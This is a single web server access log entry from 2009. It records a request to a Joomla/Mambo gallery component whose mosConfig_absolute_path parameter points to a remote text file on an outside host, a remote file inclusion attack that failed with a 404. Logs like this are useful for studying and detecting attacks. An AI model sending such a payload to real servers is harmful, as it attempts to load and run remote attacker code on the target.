207.182.137.218 - - [04/Jan/2009:08:25:53 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.geocities.com/leoharjo/idpit.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
